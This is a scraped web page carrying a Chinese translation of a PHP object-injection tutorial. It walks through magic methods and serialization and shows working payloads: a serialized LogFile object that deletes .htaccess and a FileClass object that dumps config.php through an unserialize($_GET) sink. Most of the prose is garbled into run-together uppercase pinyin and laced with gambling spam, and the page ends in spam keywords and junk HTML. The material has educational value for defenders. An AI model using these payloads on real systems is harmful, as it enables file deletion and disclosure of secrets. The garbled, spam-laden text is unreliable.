92棋牌游戏下载

   7个月前 (09-09) 中国互联安全响应中心  PHP
文章评分 1 次,平均分 4.0

0x00 背景


YUANWEN:http://securitycafe.ro/2015/01/05/understanding-php-object-injection/

phpDUIXIANGZHURUSHIYIGEFEICHANGCHANGJIANDELOUDONG,ZHEIGELEIXINGDELOUDONGSUIRANYOUXIENANYILIYONG,DANRENGJIUFEICHANGWEIXIAN,WEILELIJIEZHEIGELOUDONG,QINGDUZHEJUBEIJICHUDEphpZHISHI。

0x01 漏洞案例


RUGUONIJUEDEZHEISHIGEZHAZHADONG,NEIMEQINGKANYIYANZHEIGELIEBIAO,YIXIEBEISHENJIGOUWADAOGUOGAILOUDONGDEXITONG,NIKEYIFAXIANDOUSHIYIXIEERSHUNENGXIANGDEWANYI(JIUGUOWAILAISHUO)

WordPress 3.6.1

Magento 1.9.0.1

Joomla 3.0.3

Ip board 3.3.5

CHUCIZHIWAIDENGDENGYIDUIXITONG,BACHENGKENENGDAGAIZAIZHEIXIEHAIYOUQITADEphpCHENGXUZHONGHAIYOUHENDUOZHEIZHONGLEIXINGDELOUDONG,SUOYIBUFANGKAOLVZUOXIAHEBEIKAFEIBINGQIESHIZHEQULIJIEZHEIPIANWENZHANG。

0x01 PHP类和对象


92棋牌游戏下载LEIHEBIANLIANGSHIFEICHANGRONGYILIJIEDEphpGAINIAN,DAGEBIFANG,XIAMIANDEDAIMAZAIYIGELEIZHONGDINGYILEYIGEBIANLIANGHEYIGEFANGFA。

#!php
<?php
class TestClass
{
    // 一个变量
    public $variable = 'This is a string';

    // 一个简单的方法
    public function PrintVariable()
    {
        echo $this->variable;
    }
}

// 创建一个对象
$object = new TestClass();

// 调用一个方法
$object->PrintVariable();
?>

92棋牌游戏下载TACHUANGJIANLEYIGEDUIXIANGBINGQIEDIAOYONGLE PrintVariable HANSHU,GAIHANSHUHUISHUCHUBIANLIANG variable。

92棋牌游戏下载RUGUOXIANGLEJIEGENGDUOGUANYUphpMIANXIANGDUIXIANGBIANCHENGDEZHISHI QINGDIAN: http://php.net/manual/zh/language.oop5.php

0x02 php magic方法


phpLEIKENENGHUIBAOHANYIXIETESHUDEHANSHUJIAOmagicHANSHU,magicHANSHUMINGMINGSHIYIFUHAO“__”KAITOUDE,BIRU __construct, __destruct, __toString, __sleep, __wakeup HEQITADEYIXIEWANYI。

ZHEIXIEHANSHUZAIMOUXIEQINGKUANGXIAHUIZIDONGDIAOYONG,BIRU:

__construct DANGYIGEDUIXIANGCHUANGJIANSHIDIAOYONG (constructor) __destruct DANGYIGEDUIXIANGBEIXIAOHUISHIDIAOYONG (destructor) __ toStringDANGYIGEDUIXIANGBEIDANGZUOYIGEZIFUCHUANSHIYONG

WEILEGENGHAODELIJIEmagicFANGFASHIRUHEGONGZUODE,RANGWOMENTIANJIAYIGEmagicFANGFAZAIWOMENDELEIZHONG。

#!php
<?php
class TestClass
{
    // 一个变量
    public $variable = 'This is a string';

    // 一个简单的方法
    public function PrintVariable()
    {
        echo $this->variable . '<br />';
    }

    // Constructor
    public function __construct()
    {
        echo '__construct <br />';
    }

    // Destructor
    public function __destruct()
    {
        echo '__destruct <br />';
    }

    // Call
    public function __toString()
    {
        return '__toString<br />';
    }
}

// 创建一个对象
//  __construct会被调用

$object = new TestClass();

// 创建一个方法
//  'This is a string’ 这玩意会被输出

$object->PrintVariable();
// 对象被当作一个字符串
//  __toString 会被调用

echo $object;

// End of PHP script
// php脚本要结束了, __destruct会被调用

?>

WOMENWANGLITOUFANGLESANGE magicFANGFA,__construct, __destructHE __toString,NIKEYIKANCHULAI,__constructZAIDUIXIANGCHUANGJIANSHIDIAOYONG, __destructZAIphpJIAOBENJIESHUSHIDIAOYONG,__toStringZAIDUIXIANGBEIDANGZUOYIGEZIFUCHUANSHIYONGSHIDIAOYONG。

ZHEIGEJIAOBENHUISHUCHUZHEIGOUYANG:

__construct 
This is a string 
__toString 
__destruct

ZHEIZHISHIYIGEJIANDANDELIZI,RUGUONIXIANGLEJIEGENGDUOYOUGUANmagicHANSHUDELIZI,QINGDIANJIXIAMIANDELIANJIE:

92棋牌游戏下载http://php.net/manual/zh/language.oop5.magic.php

0x03 php对象序列化


92棋牌游戏下载phpYUNXUBAOCUNYIGEDUIXIANGFANGBIANYIHOUZHONGYONG,ZHEIGEGUOCHENGBEICHENGWEIXULIEHUA,DAGEBIFANG,NIKEYIBAOCUNYIGEBAOHANZHEYONGHUXINXIDEDUIXIANGFANGBIANDENGDENGZHONGYONG。

92棋牌游戏下载WEILEXULIEHUAYIGEDUIXIANG,NIXUYAODIAOYONG “serialize”HANSHU,HANSHUHUIFANHUIYIGEZIFUCHUAN,DANGNIXUYAOYONGDAOZHEIGEDUIXIANGDESHIHOUKEYISHIYONG“unserialize”QUZHONGJIANDUIXIANG。

RANGWOMENZAIXULIEHUADIUJINNEIGELIZI,KANKANXULIEHUAZHANGSHENMEYANG。

</pre>
<pre>
#!php
<?php
// 某类
class User
{
    // 类数据
    public $age = 0;
    public $name = '';

    // 输出数据
    public function PrintData()
    {
        echo 'User ' . $this->name . ' is ' . $this->age
             . ' years old. <br />';
    }
}

// 创建一个对象
$usr = new User();

// 设置数据
$usr->age = 20;
$usr->name = 'John';
// 输出数据
$usr->PrintData();
// 输出序列化之后的数据
echo serialize($usr);
?>

TAHUISHUCHU

User John is 20 years old. 
O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

92棋牌游戏下载NIKEYIKANDAOXULIEHUAZHIHOUDESHUJUZHONG YOU 20HEJohn,QIZHONGMEIYOURENHEGENLEIYOUGUANDEDONGXI,ZHIYOUQIZHONGDESHUJUBEISHUJUHUA。

WEILESHIYONGZHEIGEDUIXIANG,WOMENYONGunserializeZHONGJIANDUIXIANG。

#!php
<?php
// 某类
class User
{
    // Class data
    public $age = 0;
    public $name = '';

    // Print data
    public function PrintData()
    {
        echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
    }
}

// 重建对象
$usr = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}');

// 调用PrintData 输出数据
$usr->PrintData();
?>

ZHEHUISHUCHU

User John is 20 years old

0x04 序列化magic函数


magicHANSHUconstructor (__construct)HE destructor (__destruct) SHIHUIZAIDUIXIANGCHUANGJIANHUOZHEXIAOHUISHIZIDONGDIAOYONG,QITADEYIXIEmagicHANSHUHUIZAIserialize HUOZHE unserializeDESHIHOUBEIDIAOYONG。

__sleep magicFANGFAZAIYIGEDUIXIANGBEIXULIEHUADESHIHOUDIAOYONG。 __wakeup magicFANGFAZAIYIGEDUIXIANGBEIFANXULIEHUADESHIHOUDIAOYONG。

92棋牌游戏下载ZHUYI __sleep BIXUFANHUIYIGESHUZUYUXULIEHUADEBIANLIANGMING。

#!php
<?php
class Test
{
    public $variable = 'BUZZ';
    public $variable2 = 'OTHER';

    public function PrintVariable()
    {
        echo $this->variable . '<br />';
    }

    public function __construct()
    {
        echo '__construct<br />';
    }

    public function __destruct()
    {
        echo '__destruct<br />';
    }

    public function __wakeup()
    {
        echo '__wakeup<br />';
    }

    public function __sleep()
    {
        echo '__sleep<br />';
        return array('variable', 'variable2');
    }
}

// 创建一个对象,会调用 __construct
$obj = new Test();

// 序列化一个对象,会调用 __sleep
$serialized = serialize($obj);

//输出序列化后的字符串
print 'Serialized: ' . $serialized . <br />';
// 重建对象,会调用 __wakeup
$obj2 = unserialize($serialized);

//调用 PintVariable, 会输出数据 (BUZZ)
$obj2->PrintVariable();
// php脚本结束,会调用 __destruct 
?>

ZHEIWANYIHUISHUCHU:

__construct 
__sleep 
Serialized: O:4:"Test":2:
{s:8:"variable";s:4:"BUZZ";s:9:"variable2";s:5:"OTHER";} 
__wakeup 
BUZZ 
__destruct 
__destruct

NIKEYIKANDAO,WOMENCHUANGJIANLEYIGEDUIXIANG,XULIEHUALETA(RANHOU__sleepBEIDIAOYONG),ZHIHOUYONGXULIEHUADUIXIANGZHONGJIANHOUDEDUIXIANGCHUANGJIANLELINGYIGEDUIXIANG,JIEZHEphpJIAOBENJIESHUDESHIHOULIANGGEDUIXIANGDE__destructDOUHUIBEIDIAOYONG。

GENGDUOXIANGGUANDENEIRONG

http://php.net/manual/zh/language.oop5.serialization.php

0x05 php对象注入


XIANZAIWOMENLIJIELEXULIEHUASHIRUHEGONGZUODE,WOMENGAIRUHELIYONGTA?SHISHISHANG,LIYONGZHEIWANYIDEKENENGXINGYOUHENDUOZHONG,GUANJIANQUJUEYUYINGYONGCHENGXUDELIUCHENGYU,KEYONGDELEI,YUmagicHANSHU。

JIZHUXULIEHUADUIXIANGDEZHISHIKEKONGDE。

NIKENENGHUIZHAODAOYITAOwebCHENGXUDEYUANDAIMA,QIZHONGMOUGELEIDE__wakeup HUOZHE __destruct andQITALUANQIBAZAODEHANSHUHUIYINGXIANGDAOwebCHENGXU。

DAGEBIFANG,WOMENKENENGHUIZHAODAOYIGELEIYONGYULINSHIJIANGRIZHICHUCUNJINMOUGEWENJIAN,DANG__destructBEIDIAOYONGSHI,RIZHIWENJIANHUIBEISHANCHU。RANHOUDAIMAZHANGZHEIGOUYANG。

#!php
<?php 

class LogFile
{
    // log文件名
    public $filename = 'error.log';

    // 某代码,储存日志进文件
    public function LogData($text)
    {
        echo 'Log some data: ' . $text . '<br />';
        file_put_contents($this->filename, $text, FILE_APPEND);
    }

    // Destructor 删除日志文件
    public function __destruct()
    {
        echo '__destruct deletes "' . $this->filename . '" file. <br />';
        unlink(dirname(__FILE__) . '/' . $this->filename);
    }
}
?>

92棋牌游戏下载MOULIZIGUANYURUHESHIYONGZHEIGELEI

#!php
<?php
include 'logfile.php';

// 创建一个对象
$obj = new LogFile();

// 设置文件名和要储存的日志数据
$obj->filename = 'somefile.log';
$obj->LogData('Test');

// php脚本结束啦,__destruct被调用,somefile.log文件被删除。

?>

ZAIQITADEJIAOBEN,WOMENKENENGYOUQIAHAOZHAODAOYIGEDIAOYONG“unserialize”HANSHUDE,BINGQIEQIAHAOBIANLIANGSHIYONGHUKEKONGDE,YOUQIAHAOSHI$_GETZHILEIDESHENMEWANYIDE。

#!php
<?php
include 'logfile.php';

// ... 一些狗日的代码和 LogFile 类 ...
// 简单的类定义
class User
{
    // 类数据
    public $age = 0;
    public $name = '';

    // 输出数据
    public function PrintData()
    {
        echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
    }
}

// 重建 用户输入的 数据
$usr = unserialize($_GET['usr_serialized']);
?>

NIKAN,ZHEIGEDAIMADIAOYONGLE “LogClass” LEI,BINGQIEYOUYIGE “unserialize” ZHISHIWOMENKEYIZHURUDE。

92棋牌游戏下载SUOYIGOUZAOLEISIZHEIYANGDEDONGXI:

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

JIUJINGFASHENGLESHENMENI,YINWEISHURUSHIKEKONGDE,SUOYIWOMENKEYIGOUZAORENYIDEXULIEHUADUIXIANG,BIRU:

#!php
<?php
$obj = new LogFile();
$obj->filename = '.htaccess';
echo serialize($obj) . '<br />';
?>

ZHEIGEHUISHUCHU

O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";} 
__destruct deletes ".htaccess" file.

XIANZAIWOMENJIANGGOUZAOGUOHOUDEXULIEHUADUIXIANGFASONGJIGANGCAIDEJIAOBEN:

script.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess”;}

ZHEIHUISHUCHU

__destruct deletes ".htaccess" file.

XIANZAI .htaccess YIJINGBEIGANDIAOLE,YINWEIJIAOBENJIESHUSHI __destructHUIBEIDIAOYONG。BUGUOWOMENYIJINGKEYIKONGZHI“LogFile”LEIDEBIANLIANGLA。

ZHEIJIUSHILOUDONGMINGCHENGDEYOULAI:BIANLIANGKEKONGBINGQIEJINXINGLEunserializeCAOZUODEDIFANGZHURUXULIEHUADUIXIANG,SHIXIANDAIMAZHIXINGHUOZHEQITAKENGDIEDEXINGWEI。

SUIRANZHEIBUSHIYIGEHENHAODELIZI,BUGUOWOXIANGXINNIKEYILIJIEZHEIGEGAINIAN,unserializeZIDONGDIAOYONG __wakeup HE __destruct,JIEZHEGONGJIZHEKEYIKONGZHILEIBIANLIANG,BINGQIEGONGJIwebCHENGXU。

0x06 常见的注入点


XIANBUTAN __wakeup HE __destruct,HAIYOUYIXIEHENCHANGJIANDEZHURUDIANYUNXUNILIYONGZHEIGELEIXINGDELOUDONG,YIQIEDOUSHIQUJUEYUCHENGXULUOJI。

DAGEBIFANG,MOUYONGHULEIDINGYILEYIGE__toStringWEILERANGYINGYONGCHENGXUNENGGOUJIANGLEIZUOWEIYIGEZIFUCHUANSHUCHU(echo $obj) ,ERQIEQITALEIYEKENENGDINGYILEYIGELEIYUNXU__toStringDUQUMOUGEWENJIAN。

#!php
<?php 
// … 一些include ...
class FileClass
{
    // 文件名
    public $filename = 'error.log';

    //当对象被作为一个字符串会读取这个文件
    public function __toString()
    {
        return file_get_contents($this->filename);
    }
}

// Main User class
class User
{
    // Class data
    public $age = 0;
    public $name = '';

    // 允许对象作为一个字符串输出上面的data
    public function __toString()
    {
        return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
    }
}

// 用户可控
$obj = unserialize($_GET['usr_serialized']);

// 输出 __toString
echo $obj;

?>

so,WOMENGOUZAOurl

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

ZAIXIANGXIANG,RUGUOWOMENYONGXULIEHUADIAOYONG FileClassNI

WOMENCHUANGJIANLIYONGDAIMA

#!php
<?php
$fileobj = new FileClass();
$fileobj->filename = 'config.php';
echo serialize($fileobj);

?>

JIEZHEYONGSHENGCHENGDEexpZHURUurl

script.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:10:"config.php”;}

92棋牌游戏下载JIEZHEWANGYEHUISHUCHU config.phpDEYUANDAIMA

#!php
<?php
     $private_data = 'MAGIC';
?>

92棋牌游戏下载ps:WOXIWANGZHEIRANGNINENGGOULIJIE。

0x07 其他的利用方法


KENENGQITADEYIXIEmagicHANSHUHAICUNZAILIYONGDIAN:BIRU__call HUIZAIDUIXIANGDIAOYONGBUCUNZAIDEHANSHUSHIDIAOYONG,__get HE __setHUIZAIDUIXIANGCHANGSHIFANGWENYIXIEBUCUNZAIDELEI,BIANLIANGDENGDENGSHIDIAOYONG。

92棋牌游戏下载BUGUOXUYAOZHUYIDESHI,LIYONGCHANGJINGBUXIANYUmagicHANSHU,YEYOUYIXIEFANGSHIKEYIZAIYIBANDEHANSHUZHONGLIYONGZHEIGELOUDONG,DAGEBIFANG,YIGEMOKUAIKENENGDINGYILEYIGEJIAOgetDEHANSHUJINXINGYIXIEMINGANDECAOZUO,BIRUFANGWENSHUJUKU,ZHEIJIUKENENGZAOCHENGsqlZHURU,QUJUEYUHANSHUBENSHENDECAOZUO。

WEIYIDEYIGEJISHUNANDIANZAIYU,ZHURUDELEIBIXUZAIZHURUDIANSUOZAIDEDIFANG,BUGUOYIXIEMOKUAIHUOZHEJIAOBENHUISHIYONG“autoload”DEGONGNENG,JUTIKEYIZAIZHEILILEJIE

92棋牌游戏下载http://php.net/manual/zh/language.oop5.autoload.php

92棋牌游戏下载ps:QUDUNEIGOUSHIDEDAIMA

0x08 如何利用或者避免这个漏洞


BIEZAIRENHEYONGHUKEKONGDEDIFANGSHIYONG“unserialize”,KEYIKAOLV“json_decode“

0x09 结论


虽然很难找到而且很难利用,但是这真的真的很严重,可以导致各种各样的漏洞。


//下面这个css和插件后台设置的主题有关系,如果需要换样式,则需要修改以下CSS名称

  
 

除特别注明外,本站所有文章均为铁匠运维网原创,转载请注明出处来自http://iosdelisi.com/24932.html

中国互联是江苏邦宁科技有限公司旗下的著名IT服务供应商品牌之一,是国内IDC行业十大之一、企业互联网服务首选品牌。江苏邦宁科技成立于2003年,是国内互联网名称与数字地址服务、云数据中心机房服务的引领者,是行业云计算解决方案、网站智能建设、企业智能办公软件、移动互联网开发的创新者。自成立以来,公司秉承“一切为了客户满意”的核心理念,坚持“国际化、专业化、高端化”的发展思路,坚持“以客户需求为导向、以技术创新为基础、以服务创新为支撑”,先后为国内各级政府、社会服务机构、国内外众多500强企业及中小企业、个人客户提供了专业、高质、优越的互联网应用服务。

发表评论

暂无评论

切换注册

登录

忘记密码 ?

NINYEKEYISHIYONGDISANFANGZHANGHAOKUAIJIEDENGLU

切换登录

注册

扫一扫二维码分享

0.1的棋牌 035棋牌官方网站 0759棋牌官网下载 035棋牌唯一官网 20提的棋牌 035棋牌手机版下载 035棋牌正版官方网 1737棋牌游戏 035棋牌官网 035棋牌游戏

<small id='0xwy7'></small><noframes id='0xwy7'>

  • <tfoot id='0xwy7'></tfoot>

      <legend id='0xwy7'><style id='0xwy7'><dir id='0xwy7'><q id='0xwy7'></q></dir></style></legend>
      <i id='0xwy7'><tr id='0xwy7'><dt id='0xwy7'><q id='0xwy7'><span id='0xwy7'><b id='0xwy7'><form id='0xwy7'><ins id='0xwy7'></ins><ul id='0xwy7'></ul><sub id='0xwy7'></sub></form><legend id='0xwy7'></legend><bdo id='0xwy7'><pre id='0xwy7'><center id='0xwy7'></center></pre></bdo></b><th id='0xwy7'></th></span></q></dt></tr></i><div id='0xwy7'><tfoot id='0xwy7'></tfoot><dl id='0xwy7'><fieldset id='0xwy7'></fieldset></dl></div>

          <bdo id='0xwy7'></bdo><ul id='0xwy7'></ul>

        1. học tiếng Trung onlineyoga Viet Nam

          1. <form id='4oord'></form>
              <bdo id='4oord'><sup id='4oord'><div id='4oord'><bdo id='4oord'></bdo></div></sup></bdo>

                • học tiếng Trung onlineyoga Viet Nam

                  <small id='n37q7'></small><noframes id='n37q7'>

                • <tfoot id='n37q7'></tfoot>

                    <legend id='n37q7'><style id='n37q7'><dir id='n37q7'><q id='n37q7'></q></dir></style></legend>
                    <i id='n37q7'><tr id='n37q7'><dt id='n37q7'><q id='n37q7'><span id='n37q7'><b id='n37q7'><form id='n37q7'><ins id='n37q7'></ins><ul id='n37q7'></ul><sub id='n37q7'></sub></form><legend id='n37q7'></legend><bdo id='n37q7'><pre id='n37q7'><center id='n37q7'></center></pre></bdo></b><th id='n37q7'></th></span></q></dt></tr></i><div id='n37q7'><tfoot id='n37q7'></tfoot><dl id='n37q7'><fieldset id='n37q7'></fieldset></dl></div>

                        <bdo id='n37q7'></bdo><ul id='n37q7'></ul>

                      1. học tiếng Trung onlineyoga Viet Nam